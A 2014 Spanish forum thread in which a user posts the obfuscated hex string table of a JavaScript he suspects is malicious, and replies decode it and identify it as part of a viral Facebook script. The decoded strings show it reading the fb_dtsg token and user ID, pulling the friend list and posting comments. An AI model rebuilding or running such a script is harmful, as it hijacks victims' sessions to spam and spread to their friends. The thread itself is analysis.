[Pregunta] Como "traducir" estos códigos a texto

Iniciado por fortil, Noviembre 08, 2014, 01:16:51 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Noviembre 08, 2014, 01:16:51 PM Ultima modificación: Noviembre 08, 2014, 03:00:38 PM por blackdrake
Hola resulta que me dieron un script que sirve para algunas cosas (publicar en fb) pero este viene con su malicia pero está codificado completamente creo que ascii y hex, pero el problema es que decodificarlo ha sido todo un reto y quisiera saber si hay alguna manera de descodificarlo.

esto es parte de lo que me han pasado.
Código: text

var _0x2e14=["\x76\x61\x6C\x75\x65","\x66\x62\x5F\x64\x74\x73\x67","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x32\x34\x30\x33\x30\x30\x37\x34\x36\x31\x34\x38\x39\x36\x30","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x61\x72\x6B\x61\x64\x61\x73\x6C\x61\x72\x20\x3D\x20","\x66\x6F\x72\x20\x28\x3B\x3B\x29\x3B","","\x72\x65\x70\x6C\x61\x63\x65","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x3B","\x6C\x65\x6E\x67\x74\x68","\x65\x6E\x74\x72\x69\x65\x73","\x70\x61\x79\x6C\x6F\x61\x64","\x72\x6F\x75\x6E\x64","\x20\x40\x5B","\x75\x69\x64","\x3A","\x74\x65\x78\x74","\x5D","\x20","\x26\x66\x69\x6C\x74\x65\x72\x5B\x30\x5D\x3D\x75\x73\x65\x72","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x30\x5D\x3D\x66\x72\x69\x65\x6E\x64\x73\x5F\x6F\x6E\x6C\x79","\x26\x6F\x70\x74\x69\x6F\x6E\x73\x5B\x31\x5D\x3D\x6E\x6D","\x26\x74\x6F\x6B\x65\x6E\x3D\x76\x37","\x26\x76\x69\x65\x77\x65\x72\x3D","\x26\x5F\x5F\x75\x73\x65\x72\x3D","\x68\x74\x74\x70\x73\x3A\x2F\x2F","\x69\x6E\x64\x65\x78\x4F\x66","\x55\x52\x4C","\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x74\x79\x70\x65\x61\x68\x65\x61\x64\x2F\x66\x69\x72\x73\x74\x5F\x64\x65\x67\x72\x65\x65\x2E\x70\x68\x70\x3F\x5F\x5F\x61\x3D\x31","\x73\x65\x6E\x64","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x26\x66\x74\x5F\x65\x6E\x74\x5F\x69\x64\x65\x6E\x74\x69\x66\x69\x65\x72\x3D","\x26\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x74\x65\x78\x74\x3D","\x26\x73\x6F\x75\x72\x63\x65\x3D\x32","\x26\x63\x6C\x69\x65\x6E\x74\x5F\x69\x64\x3D\x31\x33\x37\x37\x38\x37\x31\x37\x39\x37\x31\x33\x38\x3A\x31\x37\x30\x37\x30\x31\x38\x30\x39\x32","\x26\x72\x65\x70\x6C\x79\x5F\x66\x62\x69\x64","\x26\x70\x61\x72\x65\x6E\x74\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x5F\x69\x64","\x26\x72\x6F\x6F\x74\x69\x64\x3D\x75\x5F\x6A\x73\x6F\x6E\x70\x5F\x32\x5F\x33","\x26\x63\x6C\x70\x3D\x7B\x22\x63\x6C\x5F\x69\x6D\x70\x69\x64\x22\x3A\x22\x34\x35\x33\x35\x32\x34\x61\x30\x22\x2C\x22\x63\x6C\x65\x61\x72\x63\x6F\x75\x6E\x74\x65\x72\x22\x3A\x30\x2C\x22\x65\x6C\x65\x6D\x65\x6E\x74\x69\x64\x22\x3A\x22\x6A\x73\x5F\x35\x22\x2C\x22\x76\x65\x72\x73\x69\x6F\x6E\x22\x3A\x22\x78\x22\x2C\x22\x70\x61\x72\x65\x6E\x74\x5F\x66\x62\x69\x64\x22\x3A","\x7D","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x73\x74\x69\x63\x6B\x65\x72\x5F\x66\x62\x69\x64\x3D\x30","\x26\x61\x74\x74\x61\x63\x68\x65\x64\x5F\x70\x68\x6F\x74\x6F\x5F\x66\x62\x69\x64\x3D\x30","\x26\x67\x69\x66\x74\x6F\x63\x63\x61\x73\x69\x6F\x6E","\x26\x66\x74\x5B\x74\x6E\x5D\x3D\x5B\x5D","\x26\x5F\x5F\x61\x3D\x31","\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x33\x35\x79\x6E\x78\x6C\x32\x75\x35\x46\x39\x37\x4B\x65\x70\x45\x73\x79\x6F","\x26\x5F\x5F\x72\x65\x71\x3D\x71","\x26\x66\x62\x5F\x64\x74\x73\x67\x3D","\x26\x74\x74\x73\x74\x61\x6D\x70\x3D","\x50\x4F\x53\x54","\x2F\x61\x6A\x61\x78\x2F\x75\x66\x69\x2F\x61\x64\x64\x5F\x63\x6F\x6D\x6D\x65\x6E\x74\x2E\x70\x68\x70","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x73\x74\x61\x74\x75\x73","\x63\x6C\x6F\x73\x65"];

var _0xa22c=[_0x2e14[0],_0x2e14[1],_0x2e14[2],_0x2e14[3],_0x2e14[4],_0x2e14[5],_0x2e14[6],_0x2e14[7],_0x2e14[8],_0x2e14[9],_0x2e14[10],_0x2e14[11],_0x2e14[12],_0x2e14[13],_0x2e14[14],_0x2e14[15],_0x2e14[16],_0x2e14[17],_0x2e14[18],_0x2e14[19],_0x2e14[20],_0x2e14[21],_0x2e14[22],_0x2e14[23],_0x2e14[24],_0x2e14[25],_0x2e14[26],_0x2e14[27],_0x2e14[28],_0x2e14[29],_0x2e14[30],_0x2e14[31],_0x2e14[32],_0x2e14[33],_0x2e14[34],_0x2e14[35],_0x2e14[36],_0x2e14[37],_0x2e14[38],_0x2e14[39],_0x2e14[40],_0x2e14[41],_0x2e14[42],_0x2e14[43],_0x2e14[44],_0x2e14[45],_0x2e14[46],_0x2e14[47],_0x2e14[48],_0x2e14[49],_0x2e14[50],_0x2e14[51],_0x2e14[52],_0x2e14[53],_0x2e14[54],_0x2e14[55],_0x2e14[56],_0x2e14[57],_0x2e14[58],_0x2e14[59],_0x2e14[60],_0x2e14[61],_0x2e14[62],_0x2e14[63],_0x2e14[64]];


Malo el tipo, no? gracias
Noviembre 08, 2014, 01:28:16 PM #1
hmmm creo yo que es un Shell Code, pero no se cuantos bits hay ahí...

Nivel 77 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Noviembre 08, 2014, 01:32:54 PM #2
como te dije por el irc, con esta pagina puede ir descifrando  manualmente You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Eso para el primer var y para el segundo solo toma los valores del primer array.

Saludos
Noviembre 08, 2014, 01:35:01 PM #3 Ultima modificación: Noviembre 08, 2014, 01:38:29 PM por Snifer
Fortil revisa hex() bin() str() ahi tienes tu respuesta, para decifrar.


Respecto a ver cual es cual Expresiones regulares.


Regards,
Snifer
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!


Noviembre 08, 2014, 05:37:44 PM #4
No se si te servira, pero te lo dejo

Código: text

valuefb_dtsggetElementsByNamematchcookie240300746148960onreadystatechangereadyStatearkadaslar = for (;;);replaceresponseText;lengthentriespayloadround @[uid:text] &filter[0]=user&options[0]=friends_only&options[1]=nm&token=v7&viewer=&__user=https://indexOfURLGEThttps://www.facebook.com/ajax/typeahead/first_degree.php?__a=1openhttp://www.facebook.com/ajax/typeahead/first_degree.php?__a=1sendrandomfloor&ft_ent_identifier=&comment_text=&source=2&client_id=1377871797138:1707018092&reply_fbid&parent_comment_id&rootid=u_jsonp_2_3&clp={"cl_impid":"453524a0","clearcounter":0,"elementid":"js_5","version":"x","parent_fbid":}&attached_sticker_fbid=0&attached_photo_fbid=0&giftoccasion&ft[tn]=[]&__a=1&__dyn=7n8ahyj35ynxl2u5F97KepEsyo&__req=q&fb_dtsg=&ttstamp=POST/ajax/ufi/add_comment.phpContent-typeapplication/x-www-form-urlencodedsetRequestHeaderstatusclose


saludos HomeGuard
Noviembre 08, 2014, 05:56:08 PM #5
fortil no se si tienes idea de lo que es eso, es parte de un código viral de facebook.

saludos!
Imprimir
Ir Arriba Páginas1
Acciones del Usuario